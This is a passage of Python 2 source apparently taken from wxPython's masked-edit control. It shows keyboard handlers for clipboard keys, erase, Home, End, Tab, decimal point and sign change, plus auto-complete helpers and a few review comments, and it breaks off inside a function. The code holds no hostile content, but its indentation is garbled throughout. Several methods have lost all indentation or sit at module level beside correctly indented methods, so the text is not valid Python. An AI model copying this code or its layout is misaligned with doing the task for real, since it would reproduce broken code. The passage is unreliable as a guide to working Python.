## dbg("MaskedEditMixin::_OnCtrl_S")
if self._demo:
print 'MaskedEditMixin.GetValue() = "%s"\nMaskedEditMixin.GetPlainValue() = "%s"' % (self.GetValue(), self.GetPlainValue())
print "Valid? => " + str(self.IsValid())
print "Current field, start, end, value =", str( self._FindFieldExtent(getslice=True))
return False
def _OnCtrl_X(self, event=None):
    """
    Ctrl-X / context-menu Cut handler.  Returns False so no further key
    processing occurs.
    """
    self.Cut()
    return False
def _OnCtrl_C(self, event=None):
    """
    Ctrl-C / context-menu Copy handler; relies on base control behavior.
    Returns False so no further key processing occurs.
    """
    self.Copy()
    return False
def _OnCtrl_V(self, event=None):
    """
    Ctrl-V / context-menu Paste handler.  Returns False so no further
    key processing occurs.
    """
    self.Paste()
    return False
def _OnInsert(self, event=None):
    """
    Shift-Insert pastes and Ctrl-Insert copies; any other Insert press is
    ignored.  Returns False so no further key processing occurs.
    """
    if event and isinstance(event, wx.KeyEvent):
        if event.ShiftDown():
            self.Paste()
        elif event.ControlDown():
            self.Copy()
        # unmodified Insert: do nothing
    return False
def _OnDelete(self, event=None):
    """
    Shift-Delete cuts; a plain Delete (or a non-key invocation) erases.
    Returns False so no further key processing occurs.
    """
    if event and isinstance(event, wx.KeyEvent) and event.ShiftDown():
        self.Cut()
    else:
        self._OnErase(event)
    return False
def _OnCtrl_Z(self, event=None):
    """
    Ctrl-Z / context-menu Undo handler.  Returns False so no further key
    processing occurs.
    """
    self.Undo()
    return False
def _OnCtrl_A(self, event=None):
    """
    Ctrl-A (select all) handler.  A shifted (or programmatic) invocation
    selects the whole control; a plain Ctrl-A selects only through the
    end of current input.  Returns False so no further key processing
    occurs.
    """
    end_of_input = self._goEnd(getPosOnly=True)
    if not event or (isinstance(event, wx.KeyEvent) and event.ShiftDown()):
        select_to = self._masklength
    else:
        select_to = end_of_input
    wx.CallAfter(self._SetInsertionPoint, 0)
    wx.CallAfter(self._SetSelection, 0, select_to)
    return False
def _OnErase(self, event=None, just_return_value=False):
    """
    Handles backspace and delete keypresses in the control (and the
    erase half of Cut, when called with event=None).  Computes the
    post-erasure string, vetoes the operation if it would produce an
    invalid field or control value, and otherwise queues the value,
    cursor position, and modified flag.  Returns False to skip other
    processing, except with just_return_value=True, which returns the
    candidate new string without touching the control.
    """
    sel_start, sel_to = self._GetSelection()    ## check for a range of selected text

    if event is None:   # called as action routine from Cut() operation.
        key = wx.WXK_DELETE
    else:
        key = event.GetKeyCode()

    field = self._FindField(sel_to)
    start, end = field._extent
    value = self._GetValue()
    oldstart = sel_start

    # If trying to erase beyond "legal" bounds, disallow operation:
    if( (sel_to == 0 and key == wx.WXK_BACK)
        or (self._signOk and sel_to == 1 and value[0] == ' ' and key == wx.WXK_BACK)
        or (sel_to == self._masklength and sel_start == sel_to and key in (wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE) and not field._insertRight)
        or (self._signOk and self._useParens
            and sel_start == sel_to
            and sel_to == self._masklength - 1
            and value[sel_to] == ' ' and key in (wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE) and not field._insertRight) ):
        if not wx.Validator_IsSilent():
            wx.Bell()
        return False

    # Insert-right fields erase "from the left": contents shift right and
    # the field refills from the left edge.
    if( field._insertRight                                  # an insert-right field
        and value[start:end] != self._template[start:end]   # and field not empty
        and sel_start >= start                              # and selection starts in field
        and ((sel_to == sel_start                           # and no selection
              and sel_to == end                             # and cursor at right edge
              and key in (wx.WXK_BACK, wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE))   # and either delete or backspace key
             or                                             # or
             (key == wx.WXK_BACK                            # backspacing
              and (sel_to == end                            # and selection ends at right edge
                   or sel_to < end and field._allowInsert)) ) ):   # or allow right insert at any point in field

        # if backspace but left of cursor is empty, adjust cursor right before deleting
        while( key == wx.WXK_BACK
               and sel_start == sel_to
               and sel_start < end
               and value[start:sel_start] == self._template[start:sel_start]):
            sel_start += 1
            sel_to = sel_start

        # keep everything left of the erased char/selection, plus the tail:
        if sel_start == sel_to:
            keep = sel_start -1
        else:
            keep = sel_start
        newfield = value[start:keep] + value[sel_to:end]

        # handle sign char moving from outside field into the field:
        move_sign_into_field = False
        if not field._padZero and self._signOk and self._isNeg and value[0] in ('-', '('):
            signchar = value[0]
            newfield = signchar + newfield
            move_sign_into_field = True

        # handle what should fill in from the left:
        left = ""
        for i in range(start, end - len(newfield)):
            if field._padZero:
                left += '0'
            elif( self._signOk and self._isNeg and i == 1
                  and ((self._useParens and newfield.find('(') == -1)
                       or (not self._useParens and newfield.find('-') == -1)) ):
                # reserve the sign slot:
                left += ' '
            else:
                left += self._template[i]   # this can produce strange results in combination with default values...

        newfield = left + newfield
        newstr = value[:start] + newfield + value[end:]
        # (handle sign located in "mask position" in front of field prior to delete)
        if move_sign_into_field:
            newstr = ' ' + newstr[1:]
        pos = sel_to
    else:
        # handle erasure of (left) sign, moving selection accordingly...
        if self._signOk and sel_start == 0:
            newstr = value = ' ' + value[1:]
            sel_start += 1

        if field._allowInsert and sel_start >= start:
            # selection (if any) falls within current insert-capable field:
            select_len = sel_to - sel_start

            # determine where cursor should end up:
            if key == wx.WXK_BACK:
                if select_len == 0:
                    newpos = sel_start -1
                else:
                    newpos = sel_start
                erase_to = sel_to
            else:
                newpos = sel_start
                if sel_to == sel_start:
                    erase_to = sel_to + 1
                else:
                    erase_to = sel_to

            if self._isTemplateChar(newpos) and select_len == 0:
                if self._signOk:
                    if value[newpos] in ('(', '-'):
                        newpos += 1     # don't move cusor
                        newstr = ' ' + value[newpos:]
                    elif value[newpos] == ')':
                        # erase right sign, but don't move cursor; (matching left sign handled later)
                        newstr = value[:newpos] + ' '
                    else:
                        # no deletion; just move cursor
                        newstr = value
                else:
                    # no deletion; just move cursor
                    newstr = value
            else:
                if erase_to > end: erase_to = end
                erase_len = erase_to - newpos

                left = value[start:newpos]
                right = value[erase_to:end] + self._template[end-erase_len:end]
                pos_adjust = 0
                if field._alignRight:
                    rstripped = right.rstrip()
                    if rstripped != right:
                        pos_adjust = len(right) - len(rstripped)
                        right = rstripped

                if not field._insertRight and value[-1] == ')' and end == self._masklength - 1:
                    # need to shift ) into the field:
                    right = right[:-1] + ')'
                    value = value[:-1] + ' '

                newfield = left+right
                if pos_adjust:
                    newfield = newfield.rjust(end-start)
                    newpos += pos_adjust
                newstr = value[:start] + newfield + value[end:]
            pos = newpos
        else:
            if sel_start == sel_to:
                if key == wx.WXK_BACK:
                    sel_start, sel_to = sel_to-1, sel_to-1

                if field._padZero and not value[start:sel_to].replace('0', '').replace(' ','').replace(field._fillChar, ''):
                    # preceding chars (if any) are zeros, blanks or fillchar; new char should be 0:
                    newchar = '0'
                else:
                    newchar = self._template[sel_to]    ## get an original template character to "clear" the current char

                if self._isTemplateChar(sel_to):
                    if sel_to == 0 and self._signOk and value[sel_to] == '-':   # erasing "template" sign char
                        newstr = ' ' + value[1:]
                        sel_to += 1
                    elif self._signOk and self._useParens and (value[sel_to] == ')' or value[sel_to] == '('):
                        # allow "change sign" by removing both parens:
                        newstr = value[:self._signpos] + ' ' + value[self._signpos+1:-1] + ' '
                    else:
                        newstr = value
                    newpos = sel_to
                else:
                    if field._insertRight and sel_start == sel_to:
                        # force non-insert-right behavior, by selecting char to be replaced:
                        sel_to += 1
                    # NOTE(review): two-value unpack here, while _insertKey is
                    # unpacked into five values elsewhere when called with
                    # allowAutoSelect=True -- presumably its return arity
                    # depends on that flag; confirm against _insertKey.
                    newstr, ignore = self._insertKey(newchar, sel_start, sel_start, sel_to, value)
            else:
                # selection made
                newstr = self._eraseSelection(value, sel_start, sel_to)

            pos = sel_start     # put cursor back at beginning of selection

        if self._signOk and self._useParens:
            # account for resultant unbalanced parentheses:
            left_signpos = newstr.find('(')
            right_signpos = newstr.find(')')

            if left_signpos == -1 and right_signpos != -1:
                # erased left-sign marker; get rid of right sign marker:
                newstr = newstr[:right_signpos] + ' ' + newstr[right_signpos+1:]
            elif left_signpos != -1 and right_signpos == -1:
                # erased right-sign marker; get rid of left-sign marker:
                newstr = newstr[:left_signpos] + ' ' + newstr[left_signpos+1:]

    # if erasure results in an invalid field, disallow it:
    if field._validRequired and not field.IsValid(newstr[start:end]):
        if not wx.Validator_IsSilent():
            wx.Bell()
        return False

    # if erasure results in an invalid value, disallow it:
    if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
        if not wx.Validator_IsSilent():
            wx.Bell()
        return False

    if just_return_value:
        return newstr

    # else... queue the actual control updates:
    wx.CallAfter(self._SetValue, newstr)
    wx.CallAfter(self._SetInsertionPoint, pos)

    if newstr != value:
        self.modified = True
    return False
    def _OnEnd(self,event):
        """ Handles End keypress in control. Should return False to skip other processing.

        Plain End moves to the end of the control (minus the reserved
        right-paren slot when parens are used for negative numbers).
        Ctrl-End moves to the end of actual user input, with per-field
        adjustments; Shift extends the selection instead of moving.
        All cursor/selection changes are queued via wx.CallAfter so they
        run after native key processing completes.
        """
## dbg("MaskedEditMixin::_OnEnd", indent=1)
        pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
        if not event.ControlDown():
            end = self._masklength # go to end of control
            if self._signOk and self._useParens:
                end = end - 1 # account for reserved char at end
        else:
            # Ctrl held: target is end of user input, not end of mask.
            end_of_input = self._goEnd(getPosOnly=True)
            sel_start, sel_to = self._GetSelection()
            if sel_to < pos: sel_to = pos
            field = self._FindField(sel_to)
            field_end = self._FindField(end_of_input)
            # pick different end point if either:
            # - cursor not in same field
            # - or at or past last input already
            # - or current selection = end of current field:
#### dbg('field != field_end?', field != field_end)
#### dbg('sel_to >= end_of_input?', sel_to >= end_of_input)
            if field != field_end or sel_to >= end_of_input:
                edit_start, edit_end = field._extent
#### dbg('edit_end:', edit_end)
#### dbg('sel_to:', sel_to)
#### dbg('sel_to == edit_end?', sel_to == edit_end)
#### dbg('field._index < self._field_indices[-1]?', field._index < self._field_indices[-1])
                if sel_to == edit_end and field._index < self._field_indices[-1]:
                    edit_start, edit_end = self._FindFieldExtent(self._findNextEntry(edit_end)) # go to end of next field:
                    end = edit_end
## dbg('end moved to', end)
                elif sel_to == edit_end and field._index == self._field_indices[-1]:
                    # already at edit end of last field; select to end of control:
                    end = self._masklength
## dbg('end moved to', end)
                else:
                    end = edit_end # select to end of current field
## dbg('end moved to ', end)
            else:
                # select to current end of input
                end = end_of_input
#### dbg('pos:', pos, 'end:', end)
        # Apply: Shift extends selection from pos to end; otherwise move caret.
        if event.ShiftDown():
            if not event.ControlDown():
## dbg("shift-end; select to end of control")
                pass
            else:
## dbg("shift-ctrl-end; select to end of non-whitespace")
                pass
            wx.CallAfter(self._SetInsertionPoint, pos)
            wx.CallAfter(self._SetSelection, pos, end)
        else:
            if not event.ControlDown():
## dbg('go to end of control:')
                pass
            wx.CallAfter(self._SetInsertionPoint, end)
            wx.CallAfter(self._SetSelection, end, end)
## dbg(indent=0)
        return False
    def _OnReturn(self, event):
        """
        Swallows the return, issues a Navigate event instead, since
        masked controls are "single line" by defn.

        Returns False so the caller does not continue normal key
        processing for the Return key.
        """
## dbg('MaskedEditMixin::OnReturn')
        self.Navigate(True)
        return False
    def _OnHome(self,event):
        """ Handles Home keypress in control. Should return False to skip other processing.

        Computes a (start, end) pair for the new insertion point /
        selection depending on the Shift/Ctrl modifier combination (five
        cases, enumerated inline below), then queues the cursor and
        selection updates via wx.CallAfter.
        """
## dbg("MaskedEditMixin::_OnHome", indent=1)
        pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
        sel_start, sel_to = self._GetSelection()
        # There are 5 cases here:
        # 1) shift: select from start of control to end of current
        # selection.
        if event.ShiftDown() and not event.ControlDown():
## dbg("shift-home; select to start of control")
            start = 0
            end = sel_start
        # 2) no shift, no control: move cursor to beginning of control.
        elif not event.ControlDown():
## dbg("home; move to start of control")
            start = 0
            end = 0
        # 3) No shift, control: move cursor back to beginning of field; if
        # there already, go to beginning of previous field.
        # 4) shift, control, start of selection not at beginning of control:
        # move sel_start back to start of field; if already there, go to
        # start of previous field.
        elif( event.ControlDown()
              and (not event.ShiftDown()
                   or (event.ShiftDown() and sel_start > 0) ) ):
            if len(self._field_indices) > 1:
                field = self._FindField(sel_start)
                start, ignore = field._extent
                if sel_start == start and field._index != self._field_indices[0]: # go to start of previous field:
                    start, ignore = self._FindFieldExtent(sel_start-1)
                elif sel_start == start:
                    start = 0 # go to literal beginning if edit start
                    # not at that point
                    # NOTE(review): end_of_field is assigned here and below but
                    # never read in this method — appears to be dead code.
                    end_of_field = True
            else:
                start = 0
            if not event.ShiftDown():
## dbg("ctrl-home; move to beginning of field")
                end = start
            else:
## dbg("shift-ctrl-home; select to beginning of field")
                end = sel_to
        else:
            # 5) shift, control, start of selection at beginning of control:
            # unselect by moving sel_to backward to beginning of current field;
            # if already there, move to start of previous field.
            start = sel_start
            if len(self._field_indices) > 1:
                # find end of previous field:
                field = self._FindField(sel_to)
                if sel_to > start and field._index != self._field_indices[0]:
                    ignore, end = self._FindFieldExtent(field._extent[0]-1)
                else:
                    end = start
                    end_of_field = True
            else:
                end = start
                end_of_field = False
## dbg("shift-ctrl-home; unselect to beginning of field")
## dbg('queuing new sel_start, sel_to:', (start, end))
        wx.CallAfter(self._SetInsertionPoint, start)
        wx.CallAfter(self._SetSelection, start, end)
## dbg(indent=0)
        return False
    def _OnChangeField(self, event):
        """
        Primarily handles TAB events, but can be used for any key that
        designer wants to change fields within a masked edit control.

        Shift reverses direction (previous field); Ctrl selects to the
        field boundary instead of moving.  At the first/last field, a TAB
        is converted into inter-control navigation via self.Navigate().
        Always returns False so normal key processing is skipped.
        """
## dbg('MaskedEditMixin::_OnChangeField', indent = 1)
        # determine end of current field:
        pos = self._GetInsertionPoint()
## dbg('current pos:', pos)
        sel_start, sel_to = self._GetSelection()
        # NOTE(review): this tests "< 0" although _masklength is presumably
        # never negative; looks like it may have been meant as "<= 0" — confirm
        # against callers before changing.
        if self._masklength < 0: # no fields; process tab normally
            self._AdjustField(pos)
            if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
                # As of 2.5.2, you don't call event.Skip() to do
                # this, but instead force explicit navigation, if
                # wx.TE_PROCESS_TAB is used (like in the masked edits)
                self.Navigate(True)
            #else: do nothing
## dbg(indent=0)
            return False
        field = self._FindField(sel_to)
        index = field._index
        field_start, field_end = field._extent
        slice = self._GetValue()[field_start:field_end]
## dbg('field._stopFieldChangeIfInvalid?', field._stopFieldChangeIfInvalid)
## dbg('field.IsValid(slice)?', field.IsValid(slice))
        # Optionally refuse to leave a field whose contents are invalid:
        if field._stopFieldChangeIfInvalid and not field.IsValid(slice):
## dbg('field invalid; field change disallowed')
            if not wx.Validator_IsSilent():
                wx.Bell()
## dbg(indent=0)
            return False
        if event.ShiftDown():
            # "Go backward"
            # NOTE: doesn't yet work with SHIFT-tab under wx; the control
            # never sees this event! (But I've coded for it should it ever work,
            # and it *does* work for '.' in IpAddrCtrl.)
            if pos < field_start:
## dbg('cursor before 1st field; cannot change to a previous field')
                if not wx.Validator_IsSilent():
                    wx.Bell()
## dbg(indent=0)
                return False
            if event.ControlDown():
## dbg('queuing select to beginning of field:', field_start, pos)
                wx.CallAfter(self._SetInsertionPoint, field_start)
                wx.CallAfter(self._SetSelection, field_start, pos)
## dbg(indent=0)
                return False
            elif index == 0:
                # We're already in the 1st field; process shift-tab normally:
                self._AdjustField(pos)
                if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to previous ctrl')
                    # As of 2.5.2, you don't call event.Skip() to do
                    # this, but instead force explicit navigation, if
                    # wx.TE_PROCESS_TAB is used (like in the masked edits)
                    self.Navigate(False)
                else:
## dbg('position at beginning')
                    wx.CallAfter(self._SetInsertionPoint, field_start)
## dbg(indent=0)
                return False
            else:
                # find beginning of previous field:
                begin_prev = self._FindField(field_start-1)._extent[0]
                self._AdjustField(pos)
## dbg('repositioning to', begin_prev)
                wx.CallAfter(self._SetInsertionPoint, begin_prev)
                if self._FindField(begin_prev)._selectOnFieldEntry:
                    edit_start, edit_end = self._FindFieldExtent(begin_prev)
## dbg('queuing selection to (%d, %d)' % (edit_start, edit_end))
                    wx.CallAfter(self._SetInsertionPoint, edit_start)
                    wx.CallAfter(self._SetSelection, edit_start, edit_end)
## dbg(indent=0)
                return False
        else:
            # "Go forward"
            if event.ControlDown():
## dbg('queuing select to end of field:', pos, field_end)
                wx.CallAfter(self._SetInsertionPoint, pos)
                wx.CallAfter(self._SetSelection, pos, field_end)
## dbg(indent=0)
                return False
            else:
                if pos < field_start:
## dbg('cursor before 1st field; go to start of field')
                    wx.CallAfter(self._SetInsertionPoint, field_start)
                    if field._selectOnFieldEntry:
                        wx.CallAfter(self._SetSelection, field_start, field_end)
                    else:
                        wx.CallAfter(self._SetSelection, field_start, field_start)
                    return False
                # else...
## dbg('end of current field:', field_end)
## dbg('go to next field')
                if field_end == self._fields[self._field_indices[-1]]._extent[1]:
                    # already at end of last field:
                    self._AdjustField(pos)
                    if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
                        # As of 2.5.2, you don't call event.Skip() to do
                        # this, but instead force explicit navigation, if
                        # wx.TE_PROCESS_TAB is used (like in the masked edits)
                        self.Navigate(True)
                    else:
## dbg('position at end')
                        wx.CallAfter(self._SetInsertionPoint, field_end)
## dbg(indent=0)
                    return False
                else:
                    # we have to find the start of the next field
                    next_pos = self._findNextEntry(field_end)
                    if next_pos == field_end:
## dbg('already in last field')
                        self._AdjustField(pos)
                        if event.GetKeyCode() == wx.WXK_TAB:
## dbg('tab to next ctrl')
                            # As of 2.5.2, you don't call event.Skip() to do
                            # this, but instead force explicit navigation, if
                            # wx.TE_PROCESS_TAB is used (like in the masked edits)
                            self.Navigate(True)
                        #else: do nothing
## dbg(indent=0)
                        return False
                    else:
                        self._AdjustField( pos )
                        # move cursor to appropriate point in the next field and select as necessary:
                        field = self._FindField(next_pos)
                        edit_start, edit_end = field._extent
                        if field._selectOnFieldEntry:
## dbg('move to ', next_pos)
                            wx.CallAfter(self._SetInsertionPoint, next_pos)
                            edit_start, edit_end = self._FindFieldExtent(next_pos)
## dbg('queuing select', edit_start, edit_end)
                            wx.CallAfter(self._SetSelection, edit_start, edit_end)
                        else:
                            if field._insertRight:
                                # right-insert fields get the caret at their right edge:
                                next_pos = field._extent[1]
## dbg('move to ', next_pos)
                            wx.CallAfter(self._SetInsertionPoint, next_pos)
## dbg(indent=0)
                        return False
## dbg(indent=0)
    def _OnDecimalPoint(self, event):
        """Handle the decimal-point key in numeric masks.

        For float masks, jumps the caret to the fraction field (clipping
        text typed after the decimal position); for integer masks,
        truncates the value at the caret.  Value/cursor updates are
        queued via wx.CallAfter.

        NOTE(review): this handler has no explicit return, so it returns
        None rather than the keep_processing flag it computes — confirm
        callers treat None as falsy before relying on the flag.
        """
## dbg('MaskedEditMixin::_OnDecimalPoint', indent=1)
        field = self._FindField(self._GetInsertionPoint())
        start, end = field._extent
        slice = self._GetValue()[start:end]
        # refuse to leave an invalid field, if so configured:
        if field._stopFieldChangeIfInvalid and not field.IsValid(slice):
            if not wx.Validator_IsSilent():
                wx.Bell()
            return False
        pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
        if self._isFloat: ## handle float value, move to decimal place
## dbg('key == Decimal tab; decimal pos:', self._decimalpos)
            value = self._GetValue()
            if pos < self._decimalpos:
                # caret left of the decimal: keep text up to caret, drop the rest
                # of the integer portion, keep the existing fraction:
                clipped_text = value[0:pos] + self._decimalChar + value[self._decimalpos+1:]
## dbg('value: "%s"' % self._GetValue(), "clipped_text:'%s'" % clipped_text)
                newstr = self._adjustFloat(clipped_text)
            else:
                newstr = self._adjustFloat(value)
            wx.CallAfter(self._SetValue, newstr)
            fraction = self._fields[1]
            start, end = fraction._extent
            wx.CallAfter(self._SetInsertionPoint, start)
            if fraction._selectOnFieldEntry:
## dbg('queuing selection after decimal point to:', (start, end))
                wx.CallAfter(self._SetSelection, start, end)
            else:
                wx.CallAfter(self._SetSelection, start, start)
            keep_processing = False
        if self._isInt: ## handle integer value, truncate from current position
## dbg('key == Integer decimal event')
            value = self._GetValue()
            clipped_text = value[0:pos]
## dbg('value: "%s"' % self._GetValue(), "clipped_text:'%s'" % clipped_text)
            newstr = self._adjustInt(clipped_text)
## dbg('newstr: "%s"' % newstr)
            wx.CallAfter(self._SetValue, newstr)
            newpos = len(newstr.rstrip())
            if newstr.find(')') != -1:
                newpos -= 1 # (don't move past right paren)
            wx.CallAfter(self._SetInsertionPoint, newpos)
            wx.CallAfter(self._SetSelection, newpos, newpos)
            keep_processing = False
## dbg(indent=0)
    def _OnChangeSign(self, event):
        """Handle '-', '+', '(' , ')' (and space on the sign position) in
        signed numeric masks.

        Toggles/sets self._isNeg, rewrites the sign character(s) in the
        value (paren pair when _useParens, else a leading '-'), and
        queues the value/formatting/cursor updates.  Returns False when
        the key was consumed as a sign change, True to let normal key
        processing continue.
        """
## dbg('MaskedEditMixin::_OnChangeSign', indent=1)
        key = event.GetKeyCode()
        pos = self._adjustPos(self._GetInsertionPoint(), key)
        value = self._eraseSelection()
        integer = self._fields[0]
        start, end = integer._extent
        sel_start, sel_to = self._GetSelection()
#### dbg('adjusted pos:', pos)
        if chr(key) in ('-','+','(', ')') or (chr(key) == " " and pos == self._signpos):
            cursign = self._isNeg
## dbg('cursign:', cursign)
            if chr(key) in ('-','(', ')'):
                # selecting from before the sign position forces negative;
                # otherwise the key toggles the current sign:
                if sel_start <= self._signpos:
                    self._isNeg = True
                else:
                    self._isNeg = (not self._isNeg) ## flip value
            else:
                self._isNeg = False
## dbg('isNeg?', self._isNeg)
            text, self._signpos, self._right_signpos = self._getSignedValue(candidate=value)
## dbg('text:"%s"' % text, 'signpos:', self._signpos, 'right_signpos:', self._right_signpos)
            if text is None:
                text = value
            # splice the sign character(s) into the value:
            if self._isNeg and self._signpos is not None and self._signpos != -1:
                if self._useParens and self._right_signpos is not None:
                    text = text[:self._signpos] + '(' + text[self._signpos+1:self._right_signpos] + ')' + text[self._right_signpos+1:]
                else:
                    text = text[:self._signpos] + '-' + text[self._signpos+1:]
            else:
#### dbg('self._isNeg?', self._isNeg, 'self.IsValid(%s)' % text, self.IsValid(text))
                if self._useParens:
                    text = text[:self._signpos] + ' ' + text[self._signpos+1:self._right_signpos] + ' ' + text[self._right_signpos+1:]
                else:
                    text = text[:self._signpos] + ' ' + text[self._signpos+1:]
## dbg('clearing self._isNeg')
                self._isNeg = False
            wx.CallAfter(self._SetValue, text)
            wx.CallAfter(self._applyFormatting)
## dbg('pos:', pos, 'signpos:', self._signpos)
            if pos == self._signpos or integer.IsEmpty(text[start:end]):
                wx.CallAfter(self._SetInsertionPoint, self._signpos+1)
            else:
                wx.CallAfter(self._SetInsertionPoint, pos)
            keep_processing = False
        else:
            keep_processing = True
## dbg(indent=0)
        return keep_processing
def _OnGroupChar(self, event):
"""
This handler is only registered if the mask is a numeric mask.
It allows the insertion of ',' or '.' if appropriate.
"""
## dbg('MaskedEditMixin::_OnGroupChar', indent=1)
keep_processing = True
pos = self._adjustPos(self._GetInsertionPoint(), event.GetKeyCode())
sel_start, sel_to = self._GetSelection()
groupchar = self._fields[0]._groupChar
if not self._isCharAllowed(groupchar, pos, checkRegex=True):
keep_processing = False
if not wx.Validator_IsSilent():
wx.Bell()
if keep_processing:
newstr, newpos = self._insertKey(groupchar, pos, sel_start, sel_to, self._GetValue() )
## dbg("str with '%s' inserted:" % groupchar, '"%s"' % newstr)
if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
keep_processing = False
if not wx.Validator_IsSilent():
wx.Bell()
if keep_processing:
wx.CallAfter(self._SetValue, newstr)
wx.CallAfter(self._SetInsertionPoint, newpos)
keep_processing = False
## dbg(indent=0)
return keep_processing
def _findNextEntry(self,pos, adjustInsert=True):
""" Find the insertion point for the next valid entry character position."""
## dbg('MaskedEditMixin::_findNextEntry', indent=1)
if self._isTemplateChar(pos) or pos in self._explicit_field_boundaries: # if changing fields, pay attn to flag
adjustInsert = adjustInsert
else: # else within a field; flag not relevant
adjustInsert = False
while self._isTemplateChar(pos) and pos < self._masklength:
pos += 1
# if changing fields, and we've been told to adjust insert point,
# look at new field; if empty and right-insert field,
# adjust to right edge:
if adjustInsert and pos < self._masklength:
field = self._FindField(pos)
start, end = field._extent
slice = self._GetValue()[start:end]
if field._insertRight and field.IsEmpty(slice):
pos = end
## dbg('final pos:', pos, indent=0)
return pos
def _findNextTemplateChar(self, pos):
""" Find the position of the next non-editable character in the mask."""
while not self._isTemplateChar(pos) and pos < self._masklength:
pos += 1
return pos
    def _OnAutoCompleteField(self, event):
        """Attempt auto-completion of the current field from its choice list.

        Strips fill characters from the field's current slice, asks
        _autoComplete() for a match in the configured direction
        (PageUp/Up keys search backward, everything else forward), and on
        an acceptable match replaces the field contents and notifies via
        _OnAutoSelect().  Arrow keys are then re-dispatched as cursor or
        field-change events.  Returns the keep_processing flag.
        """
## dbg('MaskedEditMixin::_OnAutoCompleteField', indent =1)
        pos = self._GetInsertionPoint()
        field = self._FindField(pos)
        edit_start, edit_end, slice = self._FindFieldExtent(pos, getslice=True)
        match_index = None
        keycode = event.GetKeyCode()
        # remove fill chars so we compare only what the user typed:
        if field._fillChar != ' ':
            text = slice.replace(field._fillChar, '')
        else:
            text = slice
        text = text.strip()
        keep_processing = True # (assume True to start)
## dbg('field._hasList?', field._hasList)
        if field._hasList:
## dbg('choices:', field._choices)
## dbg('compareChoices:', field._compareChoices)
            choices, choice_required = field._compareChoices, field._choiceRequired
            if keycode in (wx.WXK_PRIOR, wx.WXK_UP, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_UP):
                direction = -1
            else:
                direction = 1
            match_index, partial_match = self._autoComplete(direction, choices, text, compareNoCase=field._compareNoCase, current_index = field._autoCompleteIndex)
            if( match_index is None
                and (keycode in self._autoCompleteKeycodes + [wx.WXK_PRIOR, wx.WXK_NEXT, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT]
                     or (keycode in [wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN] and event.ShiftDown() ) ) ):
                # Select the 1st thing from the list:
                match_index = 0
            if( match_index is not None
                and ( keycode in self._autoCompleteKeycodes + [wx.WXK_PRIOR, wx.WXK_NEXT, wx.WXK_NUMPAD_PRIOR, wx.WXK_NUMPAD_NEXT]
                      or (keycode in [wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN] and event.ShiftDown())
                      or (keycode in [wx.WXK_DOWN, wx.WXK_NUMPAD_DOWN] and partial_match) ) ):
                # We're allowed to auto-complete:
## dbg('match found')
                value = self._GetValue()
                newvalue = value[:edit_start] + field._choices[match_index] + value[edit_end:]
## dbg('setting value to "%s"' % newvalue)
                self._SetValue(newvalue)
                self._SetInsertionPoint(min(edit_end, len(newvalue.rstrip())))
                self._OnAutoSelect(field, match_index)
                self._CheckValid() # recolor as appopriate
        if keycode in (wx.WXK_UP, wx.WXK_DOWN, wx.WXK_LEFT, wx.WXK_RIGHT,
                       wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_RIGHT):
            # treat as left right arrow if unshifted, tab/shift tab if shifted.
            if event.ShiftDown():
                if keycode in (wx.WXK_DOWN, wx.WXK_RIGHT, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_RIGHT):
                    # remove "shifting" and treat as (forward) tab:
                    event.m_shiftDown = False
                    keep_processing = self._OnChangeField(event)
            else:
                keep_processing = self._OnArrow(event)
        # else some other key; keep processing the key
## dbg('keep processing?', keep_processing, indent=0)
        return keep_processing
def _OnAutoSelect(self, field, match_index = None):
"""
Function called if autoselect feature is enabled and entire control
is selected:
"""
## dbg('MaskedEditMixin::OnAutoSelect', field._index)
if match_index is not None:
field._autoCompleteIndex = match_index
def _autoComplete(self, direction, choices, value, compareNoCase, current_index):
"""
This function gets called in response to Auto-complete events.
It attempts to find a match to the specified value against the
list of choices; if exact match, the index of then next
appropriate value in the list, based on the given direction.
If not an exact match, it will return the index of the 1st value from
the choice list for which the partial value can be extended to match.
If no match found, it will return None.
The function returns a 2-tuple, with the 2nd element being a boolean
that indicates if partial match was necessary.
"""
## dbg('autoComplete(direction=', direction, 'choices=',choices, 'value=',value,'compareNoCase?', compareNoCase, 'current_index:', current_index, indent=1)
if value is None:
## dbg('nothing to match against', indent=0)
return (None, False)
partial_match = False
if compareNoCase:
value = value.lower()
last_index = len(choices) - 1
if value in choices:
## dbg('"%s" in', choices)
if current_index is not None and choices[current_index] == value:
index = current_index
else:
index = choices.index(value)
## dbg('matched "%s" (%d)' % (choices[index], index))
if direction == -1:
## dbg('going to previous')
if index == 0: index = len(choices) - 1
else: index -= 1
else:
if index == len(choices) - 1: index = 0
else: index += 1
## dbg('change value to "%s" (%d)' % (choices[index], index))
match = index
else:
partial_match = True
value = value.strip()
## dbg('no match; try to auto-complete:')
match = None
## dbg('searching for "%s"' % value)
if current_index is None:
indices = range(len(choices))
if direction == -1:
indices.reverse()
else:
if direction == 1:
indices = range(current_index +1, len(choices)) + range(current_index+1)
## dbg('range(current_index+1 (%d), len(choices) (%d)) + range(%d):' % (current_index+1, len(choices), current_index+1), indices)
else:
indices = range(current_index-1, -1, -1) + range(len(choices)-1, current_index-1, -1)
## dbg('range(current_index-1 (%d), -1) + range(len(choices)-1 (%d)), current_index-1 (%d):' % (current_index-1, len(choices)-1, current_index-1), indices)
#### dbg('indices:', indices)
for index in indices:
choice = choices[index]
if choice.find(value, 0) == 0:
## dbg('match found:', choice)
match = index
break
else:
